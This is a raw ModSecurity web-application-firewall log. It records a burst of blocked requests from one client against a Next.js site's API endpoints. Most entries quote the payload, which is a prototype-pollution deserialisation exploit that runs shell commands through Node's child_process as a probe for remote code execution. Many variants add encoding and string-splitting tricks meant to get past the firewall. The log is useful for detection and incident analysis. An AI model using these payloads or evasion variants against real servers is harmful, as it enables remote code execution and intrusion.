{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy5c83uMXRUE9zvQSvgAAAcQ"] [Sun Apr 05 15:42:35.138832 2026] [:error] [pid 23077:tid 23103] [client 172.94.9.253:41712] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy5c83uMXRUE9zvQSvwAAAdQ"] [Sun Apr 05 15:42:35.140525 2026] [:error] [pid 1503:tid 1522] [client 172.94.9.253:41680] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy0I7AjfUQYCN-J7DhAAAAM0"] [Sun Apr 05 15:42:35.142452 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:41690] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "adJmy7xQSOrq_iRTM7dpdQAAAQM"] [Sun Apr 05 15:42:35.146731 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:41726] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy7xQSOrq_iRTM7dpeAAAAQo"] [Sun Apr 05 15:42:35.147155 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:41666] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy5c83uMXRUE9zvQSwAAAAdg"] [Sun Apr 05 15:42:35.232040 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:41804] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy5c83uMXRUE9zvQSwQAAAc0"] [Sun Apr 05 15:42:35.232038 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:41800] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy7xQSOrq_iRTM7dpegAAAQ0"] [Sun Apr 05 15:42:35.232043 2026] [:error] [pid 22788:tid 22800] [client 172.94.9.253:41788] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmyyLbhFL16Wsx-C9C_gAAAYo"] [Sun Apr 05 15:42:35.233797 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:41784] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy7xQSOrq_iRTM7dpewAAAQQ"] [Sun Apr 05 15:42:35.233908 2026] [:error] [pid 23077:tid 23100] [client 172.94.9.253:41806] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy5c83uMXRUE9zvQSwgAAAdE"] [Sun Apr 05 15:42:35.234053 2026] [:error] [pid 22788:tid 22799] [client 172.94.9.253:41760] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmyyLbhFL16Wsx-C9C_wAAAYk"] [Sun Apr 05 15:42:35.234477 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:41766] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy7xQSOrq_iRTM7dpfAAAARY"] [Sun Apr 05 15:42:35.234827 2026] [:error] [pid 1503:tid 1520] [client 172.94.9.253:41782] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy0I7AjfUQYCN-J7DhgAAAMs"] [Sun Apr 05 15:42:35.235147 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:41744] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy7xQSOrq_iRTM7dpfQAAAQY"] [Sun Apr 05 15:42:35.235949 2026] [:error] [pid 1308:tid 1350] [client 172.94.9.253:41758] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmyyj-HYEhJWFlG6ErhAAAAEY"] [Sun Apr 05 15:42:35.336708 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:41820] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJmy5c83uMXRUE9zvQSxAAAAdc"] [Sun Apr 05 15:42:35.337204 2026] [:error] [pid 31198:tid 31266] [client 172.94.9.253:41870] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmyzT5TgrBR8xRnfXA6wAAAU4"] [Sun Apr 05 15:42:35.345921 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:41882] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJmy7xQSOrq_iRTM7dpfwAAAQ4"] [Sun Apr 05 15:42:35.357663 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:41874] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: 